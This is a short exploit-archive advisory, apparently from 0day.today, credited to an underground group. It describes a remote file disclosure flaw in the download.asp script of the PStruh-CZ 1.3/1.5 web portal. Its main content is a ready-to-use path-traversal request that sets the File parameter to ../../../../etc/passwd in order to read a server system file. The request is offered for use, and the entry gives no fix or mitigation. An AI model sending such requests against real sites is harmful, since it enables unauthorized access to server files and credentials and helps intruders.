id: 1813
date: 05/01/2007
title: PStruh-CZ 1.3/1.5 (download.asp File) File Disclosure Vulnerability
author: Dj7xpl
cves: 

===================================================================
PStruh-CZ 1.3/1.5 (download.asp File) File Disclosure Vulnerability
===================================================================



          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
          |*                                                                                                 *|
          |*                                    Y! Underground Group                                         *|
          |*                                                                                                 *|
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/

          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Portal.....:   PStruh-CZ 1.3&1.5
             Type.......:   Remote File Disclosure Vulnerability
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/


          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Bug........:

	     download.asp?File=[File Path]&PT=[PostFix]
             download.asp?File=../../../../etc/passwd&pt=zip
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/



#  0day.today [2023-03-27]  #